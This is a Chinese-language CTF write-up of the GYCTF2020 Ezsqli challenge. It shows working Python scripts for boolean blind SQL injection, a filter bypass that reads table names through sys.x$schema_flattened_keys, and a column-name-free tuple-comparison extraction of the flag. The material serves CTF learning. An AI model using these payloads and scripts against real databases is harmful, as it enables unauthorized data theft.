[GYCTF2020]Ezsqli-布尔盲注+无列名注入
首页测试id=1,id=2,id=2',发现id=2'时页面显示bool(false),确认是布尔盲注,随后又通过fuzz sql测试了id=(select 1),显示id=1的页面
下面正式开始注入
1.检测数据库名长度
经过测试,n=21,后面发现通过代码盲注,这步用不到。id=(select length(database())>n)
2.爆破数据库名
数据库名为give_grandpa_pa_pa_pa
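def cyctf():
    """Recover the current database name one character at a time.

    Each POST sends a boolean condition that is true only when the
    character at position j of database() has ASCII code i; the page
    answers with "Nu1L" for the true branch. A response containing "SQL"
    means the challenge's keyword filter rejected the input. Each
    position costs up to 57 requests to the same endpoint.

    Prints the recovered name; returns None.
    """
    url = "http://9d81359a-bbc2-411e-93a8-1c9ab5312d5d.node5.buuoj.cn:81/index.php"
    database = ""
    # MySQL substr() positions are 1-based; position 0 yields '' whose
    # ascii() is 0, so the j == 0 round never matches (wasted, harmless).
    for j in range(0, 100):
        matched = False
        # Upper bound is exclusive: codes 65..121 are tried.
        for i in range(65, 122):
            payload = "if(ascii(substr((select database()),%d,1))=%d,1,3)" % (j, i)
            body = {"id": payload}
            try:
                res = requests.post(url, data=body)
            except requests.exceptions.RequestException as e:
                # The original caught the `requests.exceptions` module
                # itself (a TypeError at catch time) and then used an
                # unbound `res`; skip the failed request instead.
                print(e)
                continue
            if "SQL" in res.text:
                print("被检测了")
                break
            if "Nu1L" in res.text:
                # The original appended to an undefined name `table`
                # (NameError); the character belongs to `database`.
                database += chr(i)
                matched = True
                break
        if not matched:
            # Nothing matched at this position: the name is complete, the
            # character is outside the tried range, or the request was
            # filtered. Stop rather than spend 57 requests per remaining
            # position, mirroring the j_flag check in the later scripts.
            break
    print(database)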
3.爆破数据表名
输入id=if(ascii(substr(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='give_grandpa_pa_a_pa'),1,1))=1,1,3)
提示SQL Injection Checked. 被检测了,尝试select group_concat(table_name) from mysql.innodb_table_stats where database_name=database(),发现也被检测到了。之后尝试了
select table_name from sys.schema_table_statistics_with_buffer where table_schema=database()
select table_name from sys.x$schema_table_statistics_with_buffer where table_schema=database()
发现还不行,最后看了大佬写的WP,用的是select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()
结果:f1ag_1s_h3r3_hhhhh,users2333333333333
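def cyctf():
    """Recover the comma-joined table names of the current schema.

    Same oracle as for the database name: the condition is true when
    position j of the group_concat result has ASCII code i, and the page
    then contains "Nu1L". Table names are read from
    sys.x$schema_flattened_keys because the information_schema and
    mysql.innodb_table_stats queries trip the filter ("SQL" in the body).

    Prints the last position tried and the recovered string; returns None.
    """
    url = "http://e66e76b8-187c-4630-9276-a68e2dbff3e8.node5.buuoj.cn:81/"
    table = ""
    for j in range(1, 100):
        found = False
        # Codes 35..125 (upper bound exclusive): covers '_', digits,
        # letters and the ',' that group_concat inserts between names.
        for i in range(35, 126):
            payload = "if(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),%d,1))=%d,1,3)" % (j, i)
            body = {"id": payload}
            try:
                res = requests.post(url, data=body)
            except requests.exceptions.RequestException as e:
                # `except requests.exceptions` (a module, not an exception
                # class) raised TypeError on the first network error and
                # left `res` unbound; skip the failed request instead.
                print(e)
                continue
            if "SQL" in res.text:
                print("被检测了")
                break
            if "Nu1L" in res.text:
                table += chr(i)
                found = True
                break
        if not found:
            # No match at this position: the string is complete, the
            # character is outside the tried range, or the request was
            # filtered (the "SQL" branch above breaks without a match).
            print("出现问题")
            print(j)
            break
    print(j)
    print(table)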
4.直接爆数据
采用无列名查询的方法
由于join 和union都已经被禁了,所以只能采用ASCII的方法
首先检测字段数量,若前后字段不一致,则会false
id=1^((select 1,2)>(select * from f1ag_1s_h3r3_hhhhh))
发现有两个字段,之后就是爆破字段了
select (select 'b') > (select 'abcdefg')
#返回1
select (select 'b') > (select 'c')
#返回0
select (SELECT 'bb') > (select 'ba')
#返回1
select (SELECT 1,'bb') > (select 1,'ba')
#返回1
select (SELECT 1,'bb') > (select 2,'ba')
#返回0
select (SELECT '1') > (select 'a')
#返回0
select (SELECT 1) > (select 'a')
#返回1
select (SELECT 1) = (select '1')
#返回1
select (SELECT 1) > (select '~')
#返回1
select (SELECT 'flag') > (select 'f')
#返回1
#比较的时候,1='1',但'1'<'a',且1>'a',经测可知,数字>字符。
最终flag为flag{d6eda5a4-5b3d-4f0b-bbdb-ce660b1cf444}
import requests
# Candidate alphabet for the row comparison, in ascending order:
# '-', then the digits 0-9 (kept as ints, exactly as before), then the
# lowercase letters as one-character strings, then '{' and '}'.
q = ['-']
q.extend(range(0, 10))
q.extend(chr(code) for code in range(ord("a"), ord("z") + 1))
q.extend("{}")
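def cyctf():
    """Recover the row of f1ag_1s_h3r3_hhhhh by tuple comparison.

    The table has two columns (checked with `(select 1,2) > (select *)`
    above). For each candidate c in ascending order the page is asked
    whether `(1, flag + c) > (select * ...)`; the first candidate that
    makes the comparison true means the previous candidate was the
    correct next character. "Nu1L" marks a true comparison,
    "bool(false)" a query error, "SQL" a filtered request.

    Prints the last position tried and the recovered string; returns None.
    """
    url = "http://ccd7817e-335e-4ce4-8b07-c8c736f7de4d.node5.buuoj.cn:81/"
    flag = ""
    for j in range(0, 100):
        state = 0  # 0: no candidate matched, 1: one char added, 2: end reached
        for i, candidate in enumerate(q):
            payload = "1^(select (SELECT 1,'%s') > (select * from f1ag_1s_h3r3_hhhhh))^1" % (flag + str(candidate))
            body = {"id": payload}
            try:
                res = requests.post(url, data=body)
            except requests.exceptions.RequestException as e:
                # `except requests.exceptions` (a module) raised TypeError on
                # the first network error and left `res` unbound.
                print(e)
                continue
            if "Nu1L" in res.text:
                if i == 0:
                    # Even the smallest candidate compares greater, so no
                    # character from q follows `flag` — presumably the
                    # value is complete. The original indexed q[i - 1] ==
                    # q[-1] here and kept appending '}' until j hit 100.
                    state = 2
                    break
                flag += str(q[i - 1])
                state = 1
                break
            if "bool(false)" in res.text:
                print("出现错误")
                break
            if "SQL" in res.text:
                print("被检测了")
                break
        if state == 0:
            print("出现问题")
            print(j)
            break
        if state == 2:
            break
    print(j)
    print(flag)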